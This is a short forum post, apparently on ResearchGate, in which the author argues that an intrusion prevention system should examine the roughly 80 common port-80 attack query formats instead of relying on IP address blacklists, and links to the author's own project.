Almost every properly configured commercial system will have only one TCP/IP port open to the Internet: Port 80.

Since this is the only way into the system, hackers will try many different ways to compromise it via this port. Surprisingly, there are only about 80 to 90 different hack queries in common use over the last 6 years, or so.

Commonly available IDS/IPS systems seem to only fall into one category, which keeps a blacklist of several hundred thousand malicious addresses, to which it refers every time a query appears on port 80. To stay current, the blacklist is updated every few days.

Since there are only about 80 distinct hack query formats, doesn't it make more sense to evaluate the threat by examining the query?

That's how we designed our IPS

https://www.researchgate.net/project/IDaaS-with-secure-data-at-rest/update/5b8f19fccfe4a76455f0c213?_iepl%5BviewId%5D=7PJXGOO2rJBWn0d2VYesBa4Z&_iepl%5Bcontexts%5D%5B0%5D=projectUpdatesLog&_iepl%5BinteractionType%5D=projectUpdateDetailClickThrough

More Mark Sitkowski's questions See All
Similar questions and discussions